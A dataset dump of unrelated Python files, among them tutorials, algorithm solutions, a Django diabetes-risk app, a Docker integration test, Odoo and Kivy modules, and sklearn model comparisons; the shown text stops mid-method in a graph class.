text stringlengths 38 1.54M |
|---|
#! /usr/bin/env python
# -*- coding:utf-8 -*-
# @Time : 2017/6/18 14:18
# @Author : xiongyaokun
# @Site :
# @File : lambda-example01.py
# @Software: PyCharm
# lambda does not make code run faster; it only makes the code more concise.
# A lambda expression defines an anonymous function: x is the parameter,
# x + 1 is the function body.  (Python 2 script: print is a statement and
# filter/map return lists.)
g = lambda x: x + 1
print g(1)  # 2
print g(2)  # 3
foo = [2, 18, 9, 22, 17, 24, 8, 12, 27]
# filter/map/reduce with lambdas, each followed by the equivalent comprehension.
print filter(lambda x: x % 3 == 0, foo)
print [x for x in foo if x % 3 == 0]
print map(lambda x: x * 2 + 10, foo)
print [x * 2 + 10 for x in foo]
print reduce(lambda x, y: x + y, foo)
# Lambdas take multiple parameters and defaults just like def.
f1 = lambda x, y, z: x + y + z
print f1(1, 2, 3)  # 6
f2 = lambda x, y=2, z=3: x + y + z
print f2(1, y=4, z=5)  # 10
# lambda expressions are commonly used to build jump tables:
# lists or dicts of behaviours selected by index/key.
L = [
    (lambda x: x ** 2),
    (lambda x: x ** 3),
    (lambda x: x ** 4)
]
print L[0](2), L[1](2), L[2](2)  # 4, 8, 16
D = {
    'f1': (lambda: 2 + 3),
    'f2': (lambda: 2 * 3),
    'f3': (lambda: 2 ** 3)
}
print D['f1'](), D['f2'](), D['f3']()
# List comprehensions are more expressive than map
print [x + y for x in range(5) if x % 2 == 0 for y in range(10) if y % 2 == 1]
# Equivalent expansion of the double comprehension above.
for y in range(10):
    if y % 2 == 1:
        print [x + y for x in range(5) if x % 2 == 0]
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 6 00:15:54 2019
@author: Jens
"""
from scipy import interp
def interp1d(xi, xn, yn):
    # --------------------------------------------
    # One-dimensional linear interpolation.
    # Inputs
    #   xi -- value (or array of values) to interpolate at
    #   xn -- 1D array representing x-values (assumed increasing)
    #   yn -- 1D array representing y-values, same length as xn
    # Outputs
    #   yi -- interpolated value(s)
    # --------------------------------------------
    # BUG FIX: `from scipy import interp` was a deprecated alias that has been
    # removed from modern SciPy; numpy.interp is the maintained equivalent
    # with the identical signature and semantics.
    import numpy as np
    yi = np.interp(xi, xn, yn)
    return yi
|
from VCF.VcfNormalize import VcfNormalize
from VCF.VcfQC import VcfQC
from VCF.VcfUtils import VcfUtils
|
def merge_sort(arr: list):
    """
    In-place merge sort: O(N log N) time, O(N) auxiliary space.
    The list object passed in is reordered; nothing is returned.
    :param arr: The list to be sorted
    """
    if len(arr) <= 1:
        return
    middle = len(arr) // 2
    lower, upper = arr[:middle], arr[middle:]
    merge_sort(lower)
    merge_sort(upper)
    # Merge the two sorted halves back into arr (stable: ties keep left first).
    li = ri = wi = 0
    while li < len(lower) and ri < len(upper):
        if lower[li] < upper[ri]:
            arr[wi] = lower[li]
            li += 1
        else:
            arr[wi] = upper[ri]
            ri += 1
        wi += 1
    # Drain whichever half still holds elements.
    for leftover in lower[li:]:
        arr[wi] = leftover
        wi += 1
    for leftover in upper[ri:]:
        arr[wi] = leftover
        wi += 1
|
from functools import lru_cache
class Solution:
    """LeetCode 188: best profit from at most k buy/sell stock transactions."""

    def maxProfit(self, k: int, prices: list) -> int:
        """Return the maximum profit with at most k transactions.

        BUG FIX: the original annotated prices as ``List[int]`` without ever
        importing ``typing.List`` — evaluating the annotation raised
        NameError at class-definition time.  The builtin ``list`` is used
        instead; behaviour of the algorithm is unchanged.
        """
        n = len(prices)
        if k > n // 2:
            # Cap is not binding: greedily take every upward price move.
            ans = 0
            for i in range(1, n):
                if prices[i] > prices[i - 1]:
                    ans += prices[i] - prices[i - 1]
            return ans

        # Memoised search; the cache is local to this call so it cannot leak
        # stale results between different `prices` lists.
        @lru_cache(None)
        def dfs(idx, rem, can_buy=1):
            # Best profit from day idx onward with `rem` sells remaining;
            # can_buy=1 means no share is currently held.
            if idx > n - 1 or rem == 0:
                return 0
            ans = dfs(idx + 1, rem, can_buy)          # skip today
            if can_buy:
                ans = max(ans, dfs(idx + 1, rem, 0) - prices[idx])      # buy
            else:
                ans = max(ans, dfs(idx + 1, rem - 1, 1) + prices[idx])  # sell
            return ans

        return dfs(0, k)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 7 17:48:24 2018
@author: Administrator
"""
import builtwith
# builtwith.parse() detects which technologies a website is built with.
#print(builtwith.parse("http://www.sina.com.cn"))
print(builtwith.parse("http://www.sohu.com"))
import whois
# whois.whois() performs a WHOIS lookup; sample output is preserved below.
#print(whois.whois("http://www.sina.com.cn"))
#{
# "domain_name": "sina.com.cn",
# "registrar": "\u5317\u4eac\u65b0\u7f51\u6570\u7801\u4fe1\u606f\u6280\u672f\u6709\u9650\u516c\u53f8",
# "whois_server": null,
# "referral_url": null,
# "updated_date": null,
# "creation_date": null,
# "expiration_date": null,
# "name_servers": [
# "ns1.sina.com.cn",
# "ns2.sina.com.cn",
# "ns3.sina.com.cn",
# "ns4.sina.com.cn"
# ],
# "status": [
# "clientDeleteProhibited",
# "serverDeleteProhibited",
# "clientUpdateProhibited",
# "serverUpdateProhibited",
# "clientTransferProhibited",
# "serverTransferProhibited"
# ],
# "emails": "domainname@staff.sina.com.cn",
# "dnssec": "unsigned",
# "name": null,
# "org": null,
# "address": null,
# "city": null,
# "state": null,
# "zipcode": null,
# "country": null
#}
# WHOIS lookup for baidu.com; the sample output is recorded in the comments below.
print(whois.whois("http://www.baidu.com"))
#{
# "domain_name": [
# "BAIDU.COM",
# "baidu.com"
# ],
# "registrar": "MarkMonitor, Inc.",
# "whois_server": "whois.markmonitor.com",
# "referral_url": null,
# "updated_date": [
# "2017-07-28 02:36:28",
# "2017-07-27 19:36:28"
# ],
# "creation_date": [
# "1999-10-11 11:05:17",
# "1999-10-11 04:05:17"
# ],
# "expiration_date": [
# "2026-10-11 11:05:17",
# "2026-10-11 00:00:00"
# ],
# "name_servers": [
# "DNS.BAIDU.COM",
# "NS2.BAIDU.COM",
# "NS3.BAIDU.COM",
# "NS4.BAIDU.COM",
# "NS7.BAIDU.COM",
# "dns.baidu.com",
# "ns4.baidu.com",
# "ns7.baidu.com",
# "ns2.baidu.com",
# "ns3.baidu.com"
# ],
# "status": [
# "clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited",
# "clientTransferProhibited https://icann.org/epp#clientTransferProhibited",
# "clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited",
# "serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited",
# "serverTransferProhibited https://icann.org/epp#serverTransferProhibited",
# "serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited",
# "clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)",
# "clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)",
# "clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)",
# "serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)",
# "serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)",
# "serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)"
# ],
# "emails": [
# "abusecomplaints@markmonitor.com",
# "whoisrelay@markmonitor.com"
# ],
# "dnssec": "unsigned",
# "name": null,
# "org": "Beijing Baidu Netcom Science Technology Co., Ltd.",
# "address": null,
# "city": null,
# "state": "Beijing",
# "zipcode": null,
# "country": "CN"
#} |
def setBoxColors(bp):
    """Colour a two-box boxplot: first box blue, second box red.

    `bp` is the dict returned by Axes.boxplot(); whiskers and caps come two
    per box (indices 0-1 belong to box one, 2-3 to box two).
    """
    bp['boxes'][0].set(color='b', facecolor='b')
    bp['boxes'][1].set(color='r', facecolor='r')
    for part in ('whiskers', 'caps'):
        for idx, colour in enumerate(('b', 'b', 'r', 'r')):
            bp[part][idx].set(color=colour)
    for idx, colour in enumerate(('b', 'r')):
        bp['medians'][idx].set(color=colour)
        bp['fliers'][idx].set(color=colour)
# Build dataframes containing only numerical values (comment translated from Greek).
cols_to_transform.append('Label')
cols_to_transform.append('Id')
box_good = good.drop(cols_to_transform, axis=1)
box_bad = bad.drop(cols_to_transform, axis=1)
# One boxplot figure per numeric column: 'good' sample (blue) vs 'bad' (red).
for x in box_good.columns:
    fig, ax = plt.subplots()
    data = [box_good[x], box_bad[x]]
    bp = ax.boxplot(data, positions=[1, 2], widths=0.6, patch_artist=True)
    setBoxColors(bp)
    ax.set_title(x)
    ax.set_xlabel('Distribution')
    ax.set_ylabel('Values')
    ax.set_xticklabels(['Good', 'Bad'])
    #ax.set_xticklabels(range(10))
    plt.show()
    # NOTE(review): saving after plt.show() can produce an empty file on some
    # backends — consider calling savefig before show. TODO confirm backend.
    fig.savefig('Numerical Visualization %s' % x)
|
import os
import sys
import argparse
from joblib import dump, load
import numpy as np
import requests
from django.shortcuts import render
import operator
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# BUG FIX: the original embedded a Windows backslash in the string
# ('templates\models'), which breaks on POSIX; join components portably.
MODELS_DIR = os.path.join(BASE_DIR, 'templates', 'models')
from . import models
def getFINDRISK(d):
    """Compute a FINDRISC-style diabetes risk score from questionnaire answers
    and return a human-readable risk description (Russian).

    Keys read from d: age, BMI (numeric); waist, exercise, fvc, preparats,
    high_glucose, diabete_family (string codes from the web form).
    """
    score = 0
    # Age bands.
    if d['age'] >= 45 and d['age'] <= 54:
        score += 2
    elif d['age'] >= 55 and d['age'] <= 64:
        score += 3
    elif d['age'] >= 65:
        score += 4
    # BMI bands (a BMI of exactly 30 lands in the first band here).
    if d['BMI'] >= 25 and d['BMI'] <= 30:
        score += 1
    elif d['BMI'] >= 30:
        score += 3
    # Waist circumference category.
    # NOTE(review): both codes add 4 points; the standard FINDRISC form scores
    # the two bands 3 and 4 — possibly a transcription slip. TODO confirm.
    if d['waist'] == "1":
        score += 4
    elif d['waist'] == "2":
        score += 4
    # "5" appears to encode the no-risk answer for these two items — TODO confirm.
    if d['exercise'] != "5":
        score += 2
    if d['fvc'] != "5":
        score += 1
    if d['preparats'] == "1":
        score += 2
    if d['high_glucose'] == "1":
        score += 5
    if d['diabete_family'] == "far":
        score += 3
    elif d['diabete_family'] == "relatives":
        score += 5
    # Map the total to a risk message; a score of exactly 20 is "high",
    # only scores above 20 reach the last branch.
    answer = ""
    if score < 7:
        answer = "У Вас низкий шанс развития сахарного диабета. Примерно у 1 человека из 100 будет диабет."
    elif score >= 7 and score <= 11:
        answer = "У Вас немного повышен шанс развития сахарного диабета. Примерно у 1 человека из 25 будет диабет."
    elif score >= 12 and score <= 14:
        answer = "У Вас умеренный шанс развития сахарного диабета. Примерно у 1 человека из 6 будет диабет."
    elif score >= 15 and score <= 20:
        answer = "У Вас высокий шанс развития сахарного диабета. Примерно у 1 человека из 3 будет диабет."
    elif score >= 20:
        answer = "У Вас очень высокий шанс развития сахарного диабета. Примерно у 1 человека из 2 будет диабет."
    return answer
def MakeDataForModel(d):
    """Flatten the raw questionnaire dict into the feature list the classifier expects.

    Order: age, gender, education, smoker-flag, HBP, HD, smoking code,
    exercise, FVC, DK.
    """
    # Smoking code 3 maps to flag 0; any other code is treated as a smoker.
    smoker_flag = 0 if d['smoking'] == 3 else 1
    return [
        d['age'], d['gender'], d['education'], smoker_flag,
        d['HBP'], d['HD'], d['smoking'],
        int(d['exercise']), int(d['FVC']), d['DK'],
    ]
def getMODEL(d):
    """Run the pre-trained classifier on the prepared feature list `d` and
    return a human-readable verdict string (Russian).

    d: flat list of numeric features as produced by MakeDataForModel().
    """
    # Portable path join instead of the original '\model.joblib' concatenation.
    MODEL_FILE = os.path.join(MODELS_DIR, 'model.joblib')
    clf = load(MODEL_FILE)
    # BUG FIX: ndarray.reshape returns a NEW array; the original discarded the
    # reshaped result and predicted on the raw list instead.
    data = np.array(d).reshape(1, -1)
    out = clf.predict(data)
    if out == 1:
        answer = "Модель показала результат, что с очень большой вероятностью вы уже имеете у себя сахарный диабет. Настоятельно рекомендуется посетить врача для получения точного диагноза."
    else:
        answer = "Модель показала результат, что вы не больны сахарным диабетом на данный момент."
    return answer
# Create your views here.
def index(request):
    """Render the landing page."""
    return render(request, 'diabet/index.html')


def about(request):
    """Render the about page."""
    return render(request, 'diabet/about.html')


def poll(request):
    """Render the questionnaire form."""
    return render(request, 'diabet/poll.html')
def result(request):
    """Handle the questionnaire POST: store optional feedback, compute the
    FINDRISC score and the ML-model verdict, and render the results page.

    NOTE(review): a non-POST request falls through and returns None, which
    Django rejects — a GET fallback (render/redirect) seems to be missing.
    """
    if request.method == 'POST':
        # POST.get returns None for a missing field; None != "" is True, so an
        # absent field would store a None comment — TODO confirm intent.
        if request.POST.get('suggestions') != "":
            models.Comments.objects.create(text=request.POST.get('suggestions'))
        age = int(request.POST.get('age'))
        DK = int(request.POST.get('DK'))
        gender = int(request.POST.get('gender'))
        race = int(request.POST.get('race'))
        education = int(request.POST.get('education'))
        smoking = int(request.POST.get('smoking'))
        heart_diseases = int(request.POST.get('heart_diseases'))
        high_blood_presure = int(request.POST.get('high_blood_presure'))
        height = float(request.POST.get('height'))
        weight = float(request.POST.get('weight'))
        BMI = weight / (height * height)  # assumes height is in metres — TODO confirm
        waist = request.POST.get('waist')
        exercise = request.POST.get('exercise')
        fvc = request.POST.get('fvc')
        preparats = request.POST.get('preparats')
        high_glucose = request.POST.get('high_glucose')
        diabete_family = request.POST.get('diabete_family')
        # Inputs for the FINDRISC questionnaire score.
        FINDRISK_DATA = {
            'age': age, 'BMI': BMI, 'waist': waist, 'exercise': exercise, 'fvc': fvc,
            'preparats': preparats, 'high_glucose': high_glucose, 'diabete_family': diabete_family,
        }
        # Raw inputs for the ML model; MakeDataForModel flattens and casts these.
        # Note `race` is collected here but never used by MakeDataForModel.
        NotClearMODELDATA = {
            'age': age, 'gender': gender, 'race': race, 'education': education, 'smoking': smoking,
            'HBP': high_blood_presure, 'HD': heart_diseases, 'exercise': exercise,
            'FVC': fvc, 'DK': DK,
        }
        ModelData = MakeDataForModel(NotClearMODELDATA)
        MODEL_SCORE = getMODEL(ModelData)
        FINDRISK_SCORE = getFINDRISK(FINDRISK_DATA)
        scores = {
            'FINDRISK_SCORE': FINDRISK_SCORE, 'MODEL_SCORE': MODEL_SCORE,
        }
        return render(request, 'diabet/results.html', scores)
|
from django.conf.urls import patterns, url
from stories import views
# BUG FIX: django.conf.urls.patterns() was deprecated in Django 1.8 and removed
# in 1.10; urlpatterns can simply be a plain list of url() routes.
# NOTE(review): three routes share name='index', so reverse('index') resolves
# only to the last one registered — names kept as-is to avoid breaking templates.
urlpatterns = [
    url(r'^$', views.index, name='index'),
    url(r'^detail/(?P<story_id>\d+)/$', views.detail, name='detail'),
    url(r'^stories/$', views.stories, name='index'),
    url(r'^poems/$', views.poems, name='index'),
]
|
import time
from unittest import mock
import docker
from sqlalchemy import create_engine
from snowshu.adapters.target_adapters import PostgresAdapter
from snowshu.configs import DOCKER_REMOUNT_DIRECTORY, LOCAL_ARCHITECTURE
from snowshu.core.docker import SnowShuDocker
from snowshu.logger import Logger
from tests.common import rand_string
from tests.integration.snowflake.test_end_to_end import DOCKER_SPIN_UP_TIMEOUT
# Silence snowshu logging for the test run.
Logger().set_log_level(0, 0)
# Random names so repeated runs do not collide with leftover containers/tables.
TEST_NAME, TEST_TABLE = [rand_string(10) for _ in range(2)]
def test_creates_replica(docker_flush):
    """End-to-end replica test, once per architecture case:

    build image -> load it up with some data -> convert it to a replica ->
    spin it all down -> start the replica -> query it and confirm that the
    data is in there.
    """
    client = docker.from_env()
    # Per-case expectations: requested architectures, image tags that should
    # exist afterwards, and which arch lands in the active/passive container.
    arch_input_options = {
        'amd64': {
            'input_arch_list': ['amd64'],
            'result_images': ['latest', 'amd64'] if LOCAL_ARCHITECTURE == 'amd64' else ['amd64'],
            'active_container_arch': 'amd64',
            'passive_container_arch': None
        },
        'arm64': {
            'input_arch_list': ['arm64'],
            'result_images': ['latest', 'arm64'] if LOCAL_ARCHITECTURE == 'arm64' else ['arm64'],
            'active_container_arch': 'arm64',
            'passive_container_arch': None
        },
        'all': {
            # this case is different per machine type it runs in to save time
            'input_arch_list': ['arm64', 'amd64'] if LOCAL_ARCHITECTURE == 'arm64' else ['amd64', 'arm64'],
            'result_images': ['latest', 'arm64', 'amd64'],
            'active_container_arch': 'arm64' if LOCAL_ARCHITECTURE == 'arm64' else 'amd64',
            'passive_container_arch': 'amd64' if LOCAL_ARCHITECTURE == 'arm64' else 'arm64'
        }
    }
    for case_name, case_vars in arch_input_options.items():
        # docker_flush does not happen in between these loop cycles,
        # so containers of the same name get mixed up
        test_name_local = f'{TEST_NAME}-{case_name}'
        shdocker = SnowShuDocker()
        target_adapter = PostgresAdapter(replica_metadata={})
        target_container, passive_container = shdocker.startup(
            target_adapter,
            'SnowflakeAdapter',
            case_vars['input_arch_list'],
            envars=['POSTGRES_USER=snowshu',
                    'POSTGRES_PASSWORD=snowshu',
                    'POSTGRES_DB=snowshu',
                    f'PGDATA=/{DOCKER_REMOUNT_DIRECTORY}'])
        # add containers to adapter so that later target_adapter.copy_replica_data() works
        target_adapter.container = target_container
        target_adapter.passive_container = passive_container
        # assert container architectures are as expected
        # (container names end in "_<arch>")
        if passive_container:
            assert passive_container.name.split('_')[-1] == case_vars['passive_container_arch']
        assert target_container.name.split('_')[-1] == case_vars['active_container_arch']
        # load test data
        time.sleep(DOCKER_SPIN_UP_TIMEOUT)  # give pg a moment to spin up all the way
        engine = create_engine(
            'postgresql://snowshu:snowshu@snowshu_target:9999/snowshu')
        engine.execute(
            f'CREATE TABLE {TEST_TABLE} (column_one VARCHAR, column_two INT)')
        engine.execute(
            f"INSERT INTO {TEST_TABLE} VALUES ('a',1), ('b',2), ('c',3)")
        checkpoint = engine.execute(f"SELECT * FROM {TEST_TABLE}").fetchall()
        assert ('a', 1) == checkpoint[0]
        # copy data to passive container if exists
        target_adapter.copy_replica_data()
        replica_list = shdocker.convert_container_to_replica(test_name_local,
                                                             target_container,
                                                             passive_container)
        # assert correct replicas have been created
        # latest tag is attached to the same image instance as native arch one,
        # hence unnesting loop here
        arch_list_created_replicas = [tag.split(':')[1] for x in replica_list for tag in x.tags]
        assert sorted(arch_list_created_replicas) == sorted(case_vars['result_images'])
        for replica in replica_list:
            # get a new replica
            client = docker.from_env()
            client.containers.run(replica.id,
                                  ports={'9999/tcp': 9999},
                                  name=test_name_local,
                                  network='snowshu',
                                  detach=True)
            time.sleep(DOCKER_SPIN_UP_TIMEOUT)  # give pg a moment to spin up all the way
            engine = create_engine(
                f'postgresql://snowshu:snowshu@{test_name_local}:9999/snowshu')
            res = engine.execute(f'SELECT * FROM {TEST_TABLE}').fetchall()
            assert ('a', 1,) in res
            assert ('b', 2,) in res
            assert ('c', 3,) in res
            # verify that the extra OS packages are installed
            res = engine.execute("create extension plpython3u;")
            # remove the container so the next replica can reuse the name
            shdocker.remove_container(test_name_local)
|
from odoo import api, fields, models, _
class Sale_Order(models.Model):
    """sale.order extension: mirrors create_date into a custom field and adds
    a phone number field."""
    _inherit = "sale.order"

    custom_create_date = fields.Date("Create Date")  # copy of create_date, set in create()
    phone_no = fields.Char(string='Phone')

    @api.model
    def create(self, vals):
        """Assign the order name from the (company-scoped) sequence, default the
        partner-derived fields, then stamp custom_create_date."""
        if vals.get('name', _('New')) == _('New'):
            if 'company_id' in vals:
                vals['name'] = self.env['ir.sequence'].with_context(
                    force_company=vals['company_id']).next_by_code('sale.order') or _('New')
            else:
                vals['name'] = self.env['ir.sequence'].next_by_code('sale.order') or _('New')
        # Makes sure partner_invoice_id, partner_shipping_id and pricelist_id are defined
        if any(f not in vals for f in ['partner_invoice_id', 'partner_shipping_id', 'pricelist_id']):
            partner = self.env['res.partner'].browse(vals.get('partner_id'))
            addr = partner.address_get(['delivery', 'invoice'])
            vals['partner_invoice_id'] = vals.setdefault('partner_invoice_id', addr['invoice'])
            vals['partner_shipping_id'] = vals.setdefault('partner_shipping_id', addr['delivery'])
            vals['pricelist_id'] = vals.setdefault(
                'pricelist_id',
                partner.property_product_pricelist and partner.property_product_pricelist.id)
        result = super(Sale_Order, self).create(vals)
        result.write({'custom_create_date': result.create_date})
        return result

    @api.model
    def search(self, args, offset=0, limit=None, order=None, count=False):
        """Search override that logs any 'name' term found in the domain.

        BUG FIX: the original hard-coded offset=0 and limit=None in the
        super() call, silently discarding the caller's pagination; the
        arguments are now passed through.
        """
        menus = super(Sale_Order, self).search(args, offset=offset, limit=limit,
                                               order=order, count=False)
        if menus:
            # Log the searched-for name term (debug aid).
            for arg in args:
                if 'name' in arg:
                    var = arg[2]
                    print(var)
        return len(menus) if count else menus
# class Account_Invoice(models.Model):
# _inherit = "account.invoice"
#
# # @api.depends('company_id')
# # def deafult_company(self):
# # for each in self:
# #
# # user_id=self.env['res.users'].search([('id','=',each.env.uid)])
# #
# # each.company_id=user_id.company_id.id
# # return each.company_id
#
# company_id=fields.Many2one('res.company','Company', default=lambda self: self.env.user.company_id)
# class Res_Company(models.Model):
# _inherit = "res.company"
#
#
#
# send_note=fields.Text()
|
def bucle_10():
    """Print whether each number from 1..nfinal is even or odd and count both.

    NOTE: Python 2 code — input() evaluates the typed text, so nfinal is an
    int; under Python 3 input() returns str and range(1, nfinal + 1) would fail.
    """
    nfinal = input("hasta que numero quieres sumar")
    numeros_pares = 0
    numeros_impares = 0
    for numero in range(1, nfinal + 1):
        if (numero % 2 == 0):
            print str(numero), "es par"
            numeros_pares = numeros_pares + 1
        else:
            print str(numero), "es impar"
            numeros_impares = numeros_impares + 1
    # Final tallies.
    print "he contado", numeros_pares, " numeros pares"
    print "he contado", numeros_impares, "numeros impares"


bucle_10()
|
from kivy.event import EventDispatcher
from kivy.clock import Clock
from kivy.properties import DictProperty, ListProperty
from kivy.logger import Logger
import netcheck
# Debug switches for the mock billing flow: whether purchase() pretends to
# start, whether the fake purchase succeeds, and whether a retry succeeds.
PURCHASE_STARTED = True
PURCHASE_SUCCESS = False
PURCHASE_RETRY_SUCCESS = True
class MockBilling(EventDispatcher):
    """Fake in-app billing backend for exercising purchase flows in debug builds."""

    # sku -> number of times a consumable purchase has succeeded
    consumed = DictProperty()

    def __init__(self, key, skus, *args, **kwargs):
        # `key` (the store public key) is accepted for API parity but unused here.
        super(MockBilling, self).__init__(*args, **kwargs)
        self.error_msg = 'debugging'
        self.skus = skus

    def purchase(self, sku, callback=None):
        """Start a fake purchase of `sku`; `callback(success, error_msg)` fires
        asynchronously. Returns whether the purchase was started."""
        callback = callback if callback else lambda *args, **kwargs: None
        if PURCHASE_STARTED:
            Logger.info('Ha ha faking purchase of ' + sku)
            self.purchase_callback = callback
            self.purchasing = sku
            self._process_purchase()
        return PURCHASE_STARTED

    def retry_prompt(self, callback):
        ''' monkey patch here to implement a real prompt'''
        callback(False)

    def set_retry_prompt(self, fn):
        self.retry_prompt = fn

    def _process_purchase(self):
        # Requires connectivity; otherwise ask the user to connect first.
        sku = self.purchasing
        if not netcheck.connection_available():
            netcheck.ask_connect(self._connection_callback)
        else:
            def purchase_response(dt):
                if PURCHASE_SUCCESS:
                    c = self.consumed
                    # BUG FIX: dict.has_key() was removed in Python 3; use `in`.
                    if sku in c:
                        self.consumed[sku] += 1
                    else:
                        self.consumed[sku] = 1
                    self.purchase_callback(True, '')
                else:
                    self._fail()
            # Simulate network latency before delivering the result.
            Clock.schedule_once(purchase_response, 0.5)

    def _connection_callback(self, connected):
        Logger.info('in billing connection callback: ' + str(connected))
        if connected:
            self._process_purchase()
        else:
            self._fail()

    def _fail(self):
        self._ask_retry()

    def _ask_retry(self):
        self.retry_prompt(self._retry_callback)

    def _retry_callback(self, retry):
        if retry:
            # A retry flips the global success flag to the retry outcome.
            global PURCHASE_SUCCESS
            PURCHASE_SUCCESS = PURCHASE_RETRY_SUCCESS
            self._process_purchase()
        else:
            self.purchase_callback(False, self.error_msg)
            self.purchasing = self.purchase_callback = None
|
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import pickle
from sklearn import preprocessing, metrics
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import LinearSVC
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.neural_network import MLPClassifier
# Load the training data (semicolon-separated CSV).
graduates_data = pd.read_csv('score_board_train.csv', delimiter=";")
le = preprocessing.LabelEncoder()
#convert the categorical columns into numeric
graduates_data['accepted'] = le.fit_transform(graduates_data['accepted'])
graduates_data['graduated'] = le.fit_transform(graduates_data['graduated'])
graduates_data['id'] = le.fit_transform(graduates_data['id'])
# Rescale fractional exam scores to a 0-100 range and round them.
graduates_data['art_exam'] = graduates_data['art_exam'] * 100
graduates_data['art_exam'] = graduates_data['art_exam'].round(decimals=3)
graduates_data['maths_exam'] = graduates_data['maths_exam'] * 100
graduates_data['maths_exam'] = graduates_data['maths_exam'].round(decimals=3)
graduates_data['language_exam'] = graduates_data['language_exam'] * 100
graduates_data['language_exam'] = graduates_data['language_exam'].round(decimals=3)
graduates_data['interview_score'] = graduates_data['interview_score'] * 100
graduates_data['interview_score'] = graduates_data['interview_score'].round(decimals=3)
graduates_data['essay_score'] = graduates_data['essay_score'] * 100
graduates_data['essay_score'] = graduates_data['essay_score'].round(decimals=2)
graduates_data['gpa'] = graduates_data['gpa'].round(decimals=3)
# Feature columns: everything except identifiers and targets.
cols = [col for col in graduates_data.columns \
        if col not in ['id', 'graduated', 'accepted', 'year']]
data = graduates_data[cols]
target = graduates_data['graduated']
#split data set into train and test sets
data_train, data_test, target_train, target_test = train_test_split(data, target, test_size=0.15, random_state=10)
# Train and score several classifiers on the same split.
gauss_model = GaussianNB()
gauss_model.fit(data_train, target_train)
y_pred = gauss_model.predict(data_test)
print ("Gaussian score : ", accuracy_score(target_test, y_pred))
neigh_model = KNeighborsClassifier(n_neighbors=50, algorithm='auto')
neigh_model.fit(data_train, target_train)
pred = neigh_model.predict(data_test)
print ("Kneighbors accuracy score : ", accuracy_score(target_test, pred))
svc_model = LinearSVC(random_state=0, max_iter=5000)
pred = svc_model.fit(data_train, target_train).predict(data_test)
print("LinearSVC accuracy : ", accuracy_score(target_test, pred, normalize=True))
rfc_model = RandomForestClassifier(n_estimators=100)
pred_rfc = rfc_model.fit(data_train, target_train).predict(data_test)
print("RandomForestClassifier : ", accuracy_score(target_test, pred_rfc, normalize=True))
mlp_model = MLPClassifier()
pred_mlp = mlp_model.fit(data_train, target_train).predict(data_test)
print("MLP accuracy : ", accuracy_score(target_test, pred_mlp, normalize=True))
#ada_model = AdaBoostClassifier()
#pred_ada = ada_model.fit(data_train,target_train).predict(data_test)
#print("AdaBoost accuracy : ",accuracy_score(target_test, pred_ada, normalize = True))
# NOTE(review): only the KNN model is persisted, and the open() handle is
# never closed — a `with` block would be safer.
pickle.dump(neigh_model, open("model_neigh.pkl", "wb"))
from django.db import models
class Compradores(models.Model):
    """Buyer record with address and geocoding fields."""
    id = models.IntegerField(primary_key=True)
    nombre = models.CharField(max_length=200)
    apellido = models.CharField(max_length=200)
    direccion = models.CharField(max_length=200)
    ciudad = models.CharField(max_length=200)
    longitud = models.CharField(max_length=200)
    latitud = models.CharField(max_length=200)
    estado_geo = models.CharField(max_length=200)

    def __str__(self):
        # BUG FIX: the original defined __int__ (a typo for __str__), so the
        # intended representation was never used; __str__ must return a str.
        return str(self.id)
|
import pygame
# Logical grid size (in big pixels) and real window size (16x upscale).
size = [25, 25]
rsize = [size[0] * 16, size[1] * 16]
# Keymap: keycodes 273/274 (up/down arrows) -> direction vectors.
sw = {273: [0, -1],
      274: [0, 1]}
def bigPx(x, y, c):
    """Paint one logical pixel as a 4x4 block of colour `c` in the module-level
    pixel array, after shifting the coordinates by -2."""
    x -= 2
    y -= 2
    print("x:", x, "y:", y)
    for dx in range(4):
        for dy in range(4):
            pxarray[4 * x + dx + 1, 4 * y + dy + 1] = c
def step():
    """Advance one frame: present the back buffer and cap the loop at 40 FPS."""
    pygame.display.flip()
    clock.tick(40)
surface = pygame.display.set_mode(size=(rsize[0], rsize[1]))
pxarray = pygame.PixelArray(surface)
clock = pygame.time.Clock()
# Main loop: flip/tick each frame, then poll the event queue for arrow keys.
while True:
    step()
    for event in pygame.event.get():
        if event.type == pygame.KEYDOWN:
            # NOTE(review): dirval is looked up but never used — presumably a
            # movement update was intended here.
            dirval = sw.get(event.key)
|
import random
from collections import OrderedDict
from operator import itemgetter
class Grafo:
    """Undirected graph backed by a dict-of-dicts adjacency structure."""

    def __init__(self):
        self.grafo = {}          # vertex -> {adjacent vertex: None}
        self.cant_vertices = 0
        self.cant_aristas = 0

    def agregar_vertice(self, elemento):
        """Add (or reset) a vertex with no edges."""
        self.grafo[elemento] = {}
        self.cant_vertices += 1

    def eliminar_vertice(self, elemento):
        """Remove a vertex and every edge incident to it."""
        if elemento in self.grafo:
            for adyacente in self.grafo[elemento]:
                self.grafo[adyacente].pop(elemento)
                self.cant_aristas -= 1
            self.grafo.pop(elemento)
            self.cant_vertices -= 1

    def agregar_arista(self, elemento1, elemento2):
        """Connect two existing vertices (re-adding an edge still bumps the count)."""
        self.grafo[elemento1][elemento2] = None
        self.grafo[elemento2][elemento1] = None
        self.cant_aristas += 1

    def eliminar_arista(self, elemento1, elemento2):
        """Disconnect two vertices; raises if they are not connected."""
        if elemento1 in self.grafo[elemento2]:
            self.grafo[elemento1].pop(elemento2)
            self.grafo[elemento2].pop(elemento1)
            self.cant_aristas -= 1
        else:
            raise Exception("Los elementos no están conectados")

    def son_adyacentes(self, elemento1, elemento2):
        """Return True if the two vertices share an edge."""
        return (elemento1 in self.grafo[elemento2])

    def obtener_adyacentes(self, elemento):
